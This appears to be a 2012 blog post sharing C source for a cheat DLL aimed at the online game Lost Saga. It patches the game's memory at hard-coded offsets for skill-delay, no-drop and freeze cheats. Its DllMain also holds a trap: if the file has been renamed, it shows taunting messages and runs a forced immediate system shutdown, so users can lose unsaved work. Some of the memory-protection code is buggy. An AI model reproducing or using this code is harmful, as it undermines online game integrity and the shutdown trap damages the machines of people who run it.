Minggu, 16 September 2012

Base lost saga

//======================================//

// LostSaga Base Auto ON

// Credit by Dimas Adi Nugroho

// Don't Share Not Created Or Thank'z !

// Don't Change / Edit This Articel !

// You Change This Articel , You Is Leacher !!

//======================================//

 

#include <windows.h>

#pragma warning(disable: 4700)

LPTSTR APP = "lostsaga.exe"; // Process Game

DWORD Gravity, adrSpeed, dwI3EXEC, adrProteck, adrDelay, adrReload , adrDelay2 , adrGrade , adrKick , adrDrop , adrPenalty ,adrTokenGold ,adrBrutallDamage ,adrCrusade, adrDarah,ofsMNZ1, dwBase, Change, CheckProtection;

void Blucyz(void *adr, void *ptr, int size)

{

DWORD CheckProtection;

VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &ofsMNZ1);

RtlMoveMemory(adr,ptr,size);

VirtualProtect(adr,size,CheckProtection, &dwBase);

}

//Protect address

void InProtectAndModify(DWORD Offset, DWORD Pointer, DWORD Length){

VirtualProtect((void *)Offset, Length, PAGE_EXECUTE_READWRITE, &CheckProtection); // check apakah address tsb dikunci / protected ? kalau iya, lakukan unprotect

RtlMoveMemory((void *)Offset, (const void*)Pointer, Length); // ubah address tsb menjadi writeable, dan lakukan patch dengan MEMpatch

VirtualProtect((void *)Offset, Length, CheckProtection, &CheckProtection); // protect lagi address tsb biar gk kena satpam

}

// Lakukan patch terhadap memory

int MEMhack( BYTE *Offset, BYTE *ByteArray, DWORD Length){

InProtectAndModify((DWORD)Offset , (DWORD)ByteArray , 2);

}

BOOL wanda(unsigned long ADRexec, int OFSexec, int PTRexec)

{

if (!IsBadWritePtr((void*)ADRexec, sizeof(unsigned long)))

{

if (!IsBadWritePtr((void*)(*(unsigned long*)ADRexec + OFSexec), sizeof(unsigned long)))

{

*(int*)(*(unsigned long*)ADRexec + OFSexec) = PTRexec;

}

}

return (0);

}

 

DWORD WINAPI GantengsHex(LPVOID param)

{

while(1)

{

//========================= Auto ON Hotkeys ========================================

dwI3EXEC = (DWORD)GetModuleHandleA("lostsaga.exe");

if(dwI3EXEC >0)

{

DWORD adrDelay = dwI3EXEC+0xAEF078;//Skill 0 Second

Blucyz((void *)(adrDelay),(void*)(PBYTE)"\x68\x61\x73\x5F\x73\x6B\x69\x6C\x6C\x5F\x67\x61\x75\x67\x65\x00\x6D\x61\x67\x69\x63\x5F\x63\x69\x72\x63\x6C\x65\x5F\x79\x5F\x6F\x66\x66\x73\x65\x74", 37);

DWORD adrDrop = dwI3EXEC+0xADC140;//No Drop

Blucyz((void *)(adrDrop),(void*)(PBYTE)"\x66\x61\x6C\x6C\x5F\x6D\x69\x6E\x5F\x64\x61\x6D\x61\x67\x65", 15);

DWORD adrCrusade = dwI3EXEC+0xAE4B38;//Freeze Skull Crusade

Blucyz((void *)(adrCrusade),(void*)(PBYTE)"\x4C\x69\x6D\x69\x74\x48\x50\x52\x61\x74\x65\x4D\x69\x6E", 14);

}

//------------------------------------------------------------------------------

{

Sleep(108);

}

}

return(0);

}

//------------------------------------------------------------------------------

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)

{

if(dwReason == DLL_PROCESS_ATTACH) {

char strDLLName [_MAX_PATH];

Sleep(200);

MessageBox (0,"I Love You AINUN NABILA :*kiss","Dimas & Ainun", MB_OKCANCEL + MB_ICONINFORMATION);

GetModuleFileName(hModule, strDLLName , _MAX_PATH);

if (strstr(strDLLName, "Mikazu07.dll") <= 0) {

MessageBox(0, "Why you Renaming My File ?","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);

MessageBox(0, "You This Cheater Or Leacher ?","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);

MessageBox(0, "See You , \nYour System Data We Restart\n\nTo Say GoodBye ","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);

system("start C:/Windows/System32/shutdown.exe -s -f -t 00");

ExitProcess(0);//ERROR

 

}

//------------------------------------------------------------------------------

CreateThread(0, 0, (LPTHREAD_START_ROUTINE)GantengsHex, 0, 0, 0);

}

 

return TRUE;

}

0 komentar:

Posting Komentar